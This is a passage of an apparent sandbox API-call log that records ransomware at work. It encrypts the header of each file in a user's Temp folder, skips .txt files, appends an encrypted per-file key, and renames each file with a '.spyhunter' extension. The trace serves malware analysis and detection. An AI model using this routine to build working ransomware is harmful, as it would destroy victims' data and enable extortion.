HALPmcxz\\AppData\\Local\\Temp\\gH_Ca- k7Y.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gh_ca- k7y.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gH_Ca- k7Y.m4a.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gh_ca- k7y.m4a.spyhunter")) returned 1 [0153.010] GetProcessHeap () returned 0x2c0000 [0153.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.010] GetProcessHeap () returned 0x2c0000 [0153.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0153.010] GetProcessHeap () returned 0x2c0000 [0153.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e08618 | out: hHeap=0x2c0000) returned 1 [0153.010] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed78 | out: pbBuffer=0x248ed78) returned 1 [0153.010] GetProcessHeap () returned 0x2c0000 [0153.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0153.010] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed70*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed70*=0x30) returned 1 [0153.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gH A6I30N_t.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gh a6i30n_t.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0153.011] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gH A6I30N_t.mkv") returned 68 [0153.011] StrStrW (lpFirst="gH A6I30N_t.mkv", lpSrch=".txt") returned 0x0 [0153.011] GetProcessHeap () returned 0x2c0000 [0153.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0153.011] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ed34, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ed34*=0x2800, lpOverlapped=0x0) returned 1 [0153.012] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.012] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ed34, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ed34*=0x2800, lpOverlapped=0x0) returned 1 [0153.012] GetProcessHeap () returned 0x2c0000 [0153.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0153.012] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.012] WriteFile (in: hFile=0x178, lpBuffer=0x248ed74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ed34, lpOverlapped=0x0 | out: lpBuffer=0x248ed74*, lpNumberOfBytesWritten=0x248ed34*=0x4, lpOverlapped=0x0) returned 1 [0153.012] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ed34, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ed34*=0x30, lpOverlapped=0x0) returned 1 [0153.012] CloseHandle (hObject=0x178) returned 1 [0153.012] GetProcessHeap () returned 0x2c0000 [0153.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.012] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gH A6I30N_t.mkv.spyhunter") returned 78 [0153.012] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gH A6I30N_t.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gh a6i30n_t.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gH A6I30N_t.mkv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gh a6i30n_t.mkv.spyhunter")) returned 1 [0153.013] GetProcessHeap () returned 0x2c0000 [0153.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.013] GetProcessHeap () returned 0x2c0000 [0153.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0153.013] GetProcessHeap () returned 0x2c0000 [0153.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c80da8 | out: hHeap=0x2c0000) returned 1 [0153.013] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed70 | out: pbBuffer=0x248ed70) returned 1 [0153.013] GetProcessHeap () returned 0x2c0000 [0153.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0153.014] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed68*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed68*=0x30) returned 1 [0153.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gAsw 5.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gasw 5.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0153.014] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gAsw 5.avi") returned 63 [0153.014] StrStrW (lpFirst="gAsw 5.avi", lpSrch=".txt") returned 0x0 [0153.014] GetProcessHeap () returned 0x2c0000 [0153.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0153.014] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ed2c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ed2c*=0x2800, lpOverlapped=0x0) returned 1 [0153.015] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.015] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ed2c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ed2c*=0x2800, lpOverlapped=0x0) returned 1 [0153.015] GetProcessHeap () returned 0x2c0000 [0153.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0153.015] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.015] WriteFile (in: hFile=0x178, lpBuffer=0x248ed6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ed2c, lpOverlapped=0x0 | out: lpBuffer=0x248ed6c*, lpNumberOfBytesWritten=0x248ed2c*=0x4, lpOverlapped=0x0) returned 1 [0153.015] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ed2c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ed2c*=0x30, lpOverlapped=0x0) returned 1 [0153.015] CloseHandle (hObject=0x178) returned 1 [0153.015] GetProcessHeap () returned 0x2c0000 [0153.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.016] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gAsw 5.avi.spyhunter") returned 73 [0153.016] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gAsw 5.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gasw 5.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gAsw 5.avi.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gasw 5.avi.spyhunter")) returned 1 [0153.034] GetProcessHeap () returned 0x2c0000 [0153.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.034] GetProcessHeap () returned 0x2c0000 [0153.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0153.034] GetProcessHeap () returned 0x2c0000 [0153.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c852f8 | out: hHeap=0x2c0000) returned 1 [0153.034] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed70 | out: pbBuffer=0x248ed70) returned 1 [0153.034] GetProcessHeap () returned 0x2c0000 [0153.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0153.034] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed68*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed68*=0x30) returned 1 [0153.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\g4GXg.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\g4gxg.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0153.035] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\g4GXg.ppt") returned 62 [0153.035] StrStrW (lpFirst="g4GXg.ppt", lpSrch=".txt") returned 0x0 [0153.035] GetProcessHeap () returned 0x2c0000 [0153.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0153.035] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ed2c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ed2c*=0x2800, lpOverlapped=0x0) returned 1 [0153.036] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.036] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ed2c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ed2c*=0x2800, lpOverlapped=0x0) returned 1 [0153.036] GetProcessHeap () returned 0x2c0000 [0153.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0153.036] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.036] WriteFile (in: hFile=0x178, lpBuffer=0x248ed6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ed2c, lpOverlapped=0x0 | out: lpBuffer=0x248ed6c*, lpNumberOfBytesWritten=0x248ed2c*=0x4, lpOverlapped=0x0) returned 1 [0153.036] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ed2c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ed2c*=0x30, lpOverlapped=0x0) returned 1 [0153.037] CloseHandle (hObject=0x178) returned 1 [0153.037] GetProcessHeap () returned 0x2c0000 [0153.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.037] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\g4GXg.ppt.spyhunter") returned 72 [0153.037] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\g4GXg.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\g4gxg.ppt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\g4GXg.ppt.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\g4gxg.ppt.spyhunter")) returned 1 [0153.038] GetProcessHeap () returned 0x2c0000 [0153.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.038] GetProcessHeap () returned 0x2c0000 [0153.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0153.038] GetProcessHeap () returned 0x2c0000 [0153.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85168 | out: hHeap=0x2c0000) returned 1 [0153.038] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed68 | out: pbBuffer=0x248ed68) returned 1 [0153.038] GetProcessHeap () returned 0x2c0000 [0153.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0153.038] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed60*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed60*=0x30) returned 1 [0153.038] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\fxsapidebuglogfile.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0153.038] GetProcessHeap () returned 0x2c0000 [0153.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0153.038] GetProcessHeap () returned 0x2c0000 [0153.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb4bd8 | out: hHeap=0x2c0000) returned 1 [0153.039] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed68 | out: pbBuffer=0x248ed68) returned 1 [0153.039] GetProcessHeap () returned 0x2c0000 [0153.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0153.039] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed60*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed60*=0x30) returned 1 [0153.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\FaJgt6uCvnZJF.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\fajgt6ucvnzjf.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0153.039] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\FaJgt6uCvnZJF.swf") returned 70 [0153.039] StrStrW (lpFirst="FaJgt6uCvnZJF.swf", lpSrch=".txt") returned 0x0 [0153.039] GetProcessHeap () returned 0x2c0000 [0153.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0153.039] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ed24, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ed24*=0x1219, lpOverlapped=0x0) returned 1 [0153.040] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffede7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.040] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1219, lpNumberOfBytesWritten=0x248ed24, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ed24*=0x1219, lpOverlapped=0x0) returned 1 [0153.040] GetProcessHeap () returned 0x2c0000 [0153.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0153.040] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.040] WriteFile (in: hFile=0x178, lpBuffer=0x248ed64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ed24, lpOverlapped=0x0 | out: lpBuffer=0x248ed64*, lpNumberOfBytesWritten=0x248ed24*=0x4, lpOverlapped=0x0) returned 1 [0153.041] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ed24, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ed24*=0x30, lpOverlapped=0x0) returned 1 [0153.041] CloseHandle (hObject=0x178) returned 1 [0153.041] GetProcessHeap () returned 0x2c0000 [0153.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.041] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\FaJgt6uCvnZJF.swf.spyhunter") returned 80 [0153.041] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\FaJgt6uCvnZJF.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\fajgt6ucvnzjf.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\FaJgt6uCvnZJF.swf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\fajgt6ucvnzjf.swf.spyhunter")) returned 1 [0153.042] GetProcessHeap () returned 0x2c0000 [0153.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.042] GetProcessHeap () returned 0x2c0000 [0153.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0153.042] GetProcessHeap () returned 0x2c0000 [0153.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c80cd0 | out: hHeap=0x2c0000) returned 1 [0153.042] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed60 | out: pbBuffer=0x248ed60) returned 1 [0153.042] GetProcessHeap () returned 0x2c0000 [0153.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0153.043] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed58*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed58*=0x30) returned 1 [0153.043] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\exA9JuyFd0CUYORXbL.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\exa9juyfd0cuyorxbl.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0153.043] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\exA9JuyFd0CUYORXbL.swf") returned 75 [0153.043] StrStrW (lpFirst="exA9JuyFd0CUYORXbL.swf", lpSrch=".txt") returned 0x0 [0153.043] GetProcessHeap () returned 0x2c0000 [0153.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0153.043] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ed1c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ed1c*=0x2800, lpOverlapped=0x0) returned 1 [0153.044] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.044] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ed1c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ed1c*=0x2800, lpOverlapped=0x0) returned 1 [0153.044] GetProcessHeap () returned 0x2c0000 [0153.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0153.044] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.044] WriteFile (in: hFile=0x178, lpBuffer=0x248ed5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ed1c, lpOverlapped=0x0 | out: lpBuffer=0x248ed5c*, lpNumberOfBytesWritten=0x248ed1c*=0x4, lpOverlapped=0x0) returned 1 [0153.045] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ed1c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ed1c*=0x30, lpOverlapped=0x0) returned 1 [0153.045] CloseHandle (hObject=0x178) returned 1 [0153.045] GetProcessHeap () returned 0x2c0000 [0153.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.045] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\exA9JuyFd0CUYORXbL.swf.spyhunter") returned 85 [0153.045] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\exA9JuyFd0CUYORXbL.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\exa9juyfd0cuyorxbl.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\exA9JuyFd0CUYORXbL.swf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\exa9juyfd0cuyorxbl.swf.spyhunter")) returned 1 [0153.046] GetProcessHeap () returned 0x2c0000 [0153.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.046] GetProcessHeap () returned 0x2c0000 [0153.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0153.046] GetProcessHeap () returned 0x2c0000 [0153.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb4af8 | out: hHeap=0x2c0000) returned 1 [0153.046] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed60 | out: pbBuffer=0x248ed60) returned 1 [0153.046] GetProcessHeap () returned 0x2c0000 [0153.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0153.046] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed58*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed58*=0x30) returned 1 [0153.047] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\e9RSC31dSb.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\e9rsc31dsb.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0153.047] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\e9RSC31dSb.m4a") returned 67 [0153.047] StrStrW (lpFirst="e9RSC31dSb.m4a", lpSrch=".txt") returned 0x0 [0153.047] GetProcessHeap () returned 0x2c0000 [0153.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0153.047] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ed1c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ed1c*=0x2800, lpOverlapped=0x0) returned 1 [0153.048] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.048] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ed1c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ed1c*=0x2800, lpOverlapped=0x0) returned 1 [0153.048] GetProcessHeap () returned 0x2c0000 [0153.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0153.048] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.048] WriteFile (in: hFile=0x178, lpBuffer=0x248ed5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ed1c, lpOverlapped=0x0 | out: lpBuffer=0x248ed5c*, lpNumberOfBytesWritten=0x248ed1c*=0x4, lpOverlapped=0x0) returned 1 [0153.048] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ed1c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ed1c*=0x30, lpOverlapped=0x0) returned 1 [0153.049] 